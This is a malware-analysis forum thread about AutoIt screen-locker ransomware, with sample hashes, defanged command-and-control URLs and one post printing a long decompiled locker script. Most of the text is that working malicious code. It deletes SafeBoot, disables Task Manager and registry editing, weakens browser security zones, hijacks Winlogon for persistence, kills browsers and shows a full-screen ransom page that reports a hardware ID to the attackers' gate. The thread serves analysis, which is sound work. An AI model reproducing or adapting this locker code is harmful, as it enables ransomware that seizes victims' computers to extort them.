A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #16588  by EP_X0FF
 Tue Nov 13, 2012 7:13 am
thisisu wrote:Full decompile in attach
~99% of this is just AutoIt runtime.
 #16599  by wacked2
 Tue Nov 13, 2012 8:21 pm
thisisu wrote:...
Code:
	$HAFTBEFEHLAAT = "haftbefehlaat"
...
https://www.youtube.com/watch?v=vmX6OuVjWpA
No surprise that the coder of an AutoIt winlocker listens to that crap.
 #21055  by patriq
 Thu Oct 03, 2013 7:19 pm
Sorry if this is not the right place to post, I searched the forum for this topic but only found a completed malware request.


Picked this up from exposedbotnets - attached sample
2fc103d0d52466b63d44444ce12a5901
lock display, new landing page for any country:
hxxp://213.133.111.10/panel/landing/FR.php

directory listing allowed - browse the landing pages:
hxxp://213.133.111.10/panel/landing/

and the C&C admin panel
http://213.133.111.10/panel/index.php
Attachments
infected
(390.33 KiB) Downloaded 76 times
 #21062  by EP_X0FF
 Fri Oct 04, 2013 3:08 am
AutoIt locker.

Most below is runtime, actual malware code closer to the end.
Attachments
pass: malware
(49.94 KiB) Downloaded 82 times
 #22063  by EP_X0FF
 Tue Jan 28, 2014 3:35 am
hx1997 wrote:https://www.virustotal.com/en/file/d121 ... 390825413/
GData Win32.Trojan-Ransom.Malautoit.B
Panel located at hxxp://obession.co.ua/panel2/landing/gate.php, hxxp://obession.co.ua/panel2/landing/ is an open directory.

Fun trash script hxxp://obession.co.ua/reboot/index.html

Locker internals.
Code:
$a6319525d60 = "aaabauernscheisseoki"
$a0719724408 = "aaabauernscheisseoki"
Opt("WinWaitDelay", 0x00000064)
$a4c19b20f54 = "aaabauernscheisseoki"
Opt("WinDetectHiddenText", 1)
$a1019f20a5d = "aaabauernscheisseoki"
Opt("MouseCoordMode", 0)
$a4029322b5a = "aaabauernscheisseoki"
If NOT FileExists(@StartupDir & "\" & "ja" & ".lnk") Then
	$a1d29925210 = "aaabauernscheisseoki"
	If @OSVersion = "WIN_XP" Then
		$a2b29d24543 = "aaabauernscheisseoki"
		RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot")
		$a1d39025538 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a593962365e = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a1939c23e34 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a3549225f54 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a0949820555 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a1249e24b34 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a0c5942022c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a3759a2561b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a506902215b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a3969624160 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a5869c24a41 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a4279222a25 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a417982001e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a2479e22363 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a5a89425045 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a2089a20631 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a5399020330 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a2699622160 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a3299c26325 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a22a9222023 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a63a9821d2b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a32a9e2202b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a05b9424025 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a5db9a24e01 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a1fc9022309 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a14c962115d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a55c9c22721 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a62d9220e1d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a20d9821b0f = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a00d9e24350 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a26e9424c3b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a43e9a23c35 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a4af9021d3c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a3ff962192f = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a03f9c24942 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a560a223544 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a500a820108 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a600ae20840 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a071a422d32 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a261aa22f0c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a282a022d2c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a132a622e32 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a4a2ac2494c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a373a224911 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a233a820e35 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		$a393ae21942 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		$a2c4a421f1c = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & "ja" & ".lnk")
		ProcessClose("iexplore.exe")
		ProcessClose("firefox.exe")
		Local $Var1189 = Fn0382()
		$a437ae2143f = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $Var0614 + $Var0630, $Var0634 + $Var0631 + $Var0630)
		GUISetBkColor(0x00ffffff)
		GUICtrlCreateObj($Var1189, (@DesktopWidth - 0x0000040b) / 2, (@DesktopHeight - 0x000002bc) / 2, 0x0000044c, 0x000002ee)
		GUISetState()
		Fn0203($a437ae2143f, 15, 0x000000ff, 3)
		Fn0383($Var1189, "obession.co.ua/reboot/index.html", 1)
		WinSetOnTop($a437ae2143f, "", 1)
		WinActivate($a437ae2143f)
		Sleep(0x00002af8)
		Shutdown(6)
		$a4d9a422e45 = "aaabauernscheisseoki"
		Sleep(0x000186a0)
		$a319a722626 = "aaabauernscheisseoki"
	Else
		$a1c9a922957 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a079af21917 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a22aa52382c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a04aab2245e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a3fba122a37 = "aaabauernscheisseoki"
		$a48ba325449 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a5dba923958 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a37baf25645 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a09ca522353 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a61cab20032 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a3eda125d5b = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a49da724554 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a1bdad22142 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a2cea324a44 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a17ea925f1e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a48eaf2202e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a5efa525828 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a07fab20803 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a210b121863 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a5d0b721d08 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a030bd21740 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a491b321836 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a391b92255b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a131bf25708 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a0e2b522756 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a412bb22c58 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a0f3b125108 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a583b72472c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a573bd24e30 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a384b32413c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a034b922008 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a014bf2434b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a0e5b521b4d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a595bb2583e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a586b120903 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a5c6b725311 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a3a6bd20463 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a2d7b323809 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a207b923a27 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a277bf2022e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a558b520f5e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a408bb2540d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ", @ScriptFullPath)
		$a2f9b12255d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ", @ScriptFullPath)
		$a009b725e1e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a1c9bd2131d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a38ab32260b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a03ab925c1b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a3fabf2164b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a15bb523861 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a43bbb21816 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a40cb121730 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a5acb72362a = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		$a20cbd2185e = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		$a280c325020 = "aaabauernscheisseoki"
		FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & "ja" & ".lnk")
		FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & "ja" & ".lnk")
		ProcessClose("iexplore.exe")
		ProcessClose("firefox.exe")
		Local $Var1190 = Fn0382()
		$a341c222756 = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $Var0614 + $Var0630, $Var0634 + $Var0631 + $Var0630)
		GUISetBkColor(0x00ffffff)
		GUICtrlCreateObj($Var1190, (@DesktopWidth - 0x0000040b) / 2, (@DesktopHeight - 0x000002bc) / 2, 0x0000044c, 0x000002ee)
		GUISetState()
		Fn0203($a341c222756, 15, 0x000000ff, 3)
		Fn0383($Var1190, "obession.co.ua/reboot/index.html", 1)
		WinSetOnTop($a341c222756, "", 1)
		WinActivate($a341c222756)
		Sleep(0x00002af8)
		Shutdown(6)
		$a342c82253f = "aaabauernscheisseoki"
		Sleep(0x000186a0)
		$a222cb24a27 = "aaabauernscheisseoki"
	EndIf
EndIf
$a082cd2280c = "aaabauernscheisseoki"
$a432cf23f0e = "aaabauernscheisseoki"
$a0e3c122755 = Fn0447()

Func Fn0447()
	$a363c222d50 = StringLeft(@SystemDir, 3)
	$a2d3c520012 = "0" & @CPUArch & @KBLayout & StringUpper(DriveGetType($a363c222d50)) & DriveSpaceTotal($a363c222d50)
	$a443c925246 = StringMid($a2d3c520012, Round(StringLen($a2d3c520012) / 2), Round(StringLen($a2d3c520012) / 2))
	$a1e3cc2533f = Fn0009(Fn0008($a443c925246))
	$a2d3c520012 = Fn0003(1, $a2d3c520012, $a1e3cc2533f, 4)
	Return $a2d3c520012
EndFunc

Fn0426()
$a133cf2512b = "aaabauernscheisseoki"
Local $Var1191 = Fn0382()
$a044c122c44 = "aaabauernscheisseoki"
$a284c324c27 = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $Var0614 + $Var0630, $Var0634 + $Var0631 + $Var0630)
$a324c820107 = "aaabauernscheisseoki"
GUISetBkColor(0x00ffffff)
$a3e4cb2583f = "aaabauernscheisseoki"
GUICtrlCreateObj($Var1191, (@DesktopWidth - 0x0000040b) / 2, (@DesktopHeight - 0x000002bc) / 2, 0x0000044c, 0x000002ee)
$a255c52401e = "aaabauernscheisseoki"
GUISetState()
$a345c72370f = "aaabauernscheisseoki"
Fn0203($a284c324c27, 15, 0x000000ff, 3)
$a035cc20224 = "aaabauernscheisseoki"
Fn0383($Var1191, "obession.co.ua/panel2/landing/gate.php?hwid=" & $a0e3c122755, 1)
$a036c025e2f = "aaabauernscheisseoki"
$a1d6c22103c = 0x00000400
$a176c424618 = $a1d6c22103c + 0x00000064
$a166c620750 = $a1d6c22103c + 0x00000051
$a186c821a30 = $a176c424618 + 0x00000051
$a0e6ca26225 = $a186c821a30
$a106cb24808 = $a1d6c22103c + 0x00000045
$a526cd20e5e = $a1d6c22103c + 0x0000002e
$a3b6cf24414 = $a1d6c22103c + 0x0000002b
$a0f7c120a1c = $a1d6c22103c + 0x00000029
$a267c322a0d = $a1d6c22103c + 0x0000002a
$a4b7c521e0e = $a1d6c22103c + 10
$a367c722a62 = $a1d6c22103c + 11
$a497c925330 = $a1d6c22103c + 14
$a127cb2581a = $a1d6c22103c + 12
$a2b7cd20246 = $a176c424618 + 12
